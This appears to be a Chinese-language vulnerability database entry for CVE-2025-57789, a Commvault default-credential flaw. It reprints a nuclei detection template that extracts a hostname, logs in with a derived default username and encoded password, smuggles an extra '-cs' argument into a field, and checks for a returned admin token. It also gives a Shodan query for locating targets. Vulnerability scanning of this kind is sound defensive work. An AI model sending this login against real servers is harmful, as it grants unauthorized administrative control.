CVE-2025-57789: Commvault Initial Administrator Login Process Vulnerability

日期: 2025-08-01 | 影响软件: Commvault | POC: 已公开

漏洞描述

An issue was discovered in Commvault before 11.36.60.During the brief window between installation and the first administrator login, remote attackers may exploit the default credential to gain admin control. This is limited to the setup phase, before any jobs have been configured.

PoC代码[已公开]

id: CVE-2025-57789

info:
  name: Commvault Initial Administrator Login Process Vulnerability
  author: DhiyaneshDK,watchtowr
  severity: medium
  description: |
    An issue was discovered in Commvault before 11.36.60.During the brief window between installation and the first administrator login, remote attackers may exploit the default credential to gain admin control. This is limited to the setup phase, before any jobs have been configured.
  impact: |
    Attackers can exploit default credentials during the brief setup window between installation and first administrator login to gain admin control of the Commvault instance.
  remediation: |
    Complete the initial administrator setup immediately after installation and change all default credentials.
  reference:
    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/
    - https://documentation.commvault.com/securityadvisories/CV_2025_08_4.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-57789
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:-542502280
  tags: cve,cve2025,commandcenter,commvault,unauth,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/commandcenter/publicLink.do"

    extractors:
      - type: regex
        name: connection
        group: 1
        part: body
        regex:
          - '"activeMQConnectionURL":"tcp:\/\/(.*?):\d+.*"'
        internal: true

  - raw:
      - |
        POST /commandcenter/api/Login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json;charset=UTF-8

        {
          "username": "{{connection}}_localadmin__",
          "password": "YSAtbG9jYWxhZG1pbg==",
          "commserver": "{{connection}} -cs {{connection}}"
        }

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "userGUID","token")'
        condition: and
# digest: 4a0a00473045022054e82be42d30b5984b24d31190713ebf401c7354fbcf8185cb6089d4f951dcaa022100c096de8c715e9f9630f7c34ae0a65c5c57a1f979d875d55e68a79fedb43ce0ee:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-57789.yaml

相关漏洞推荐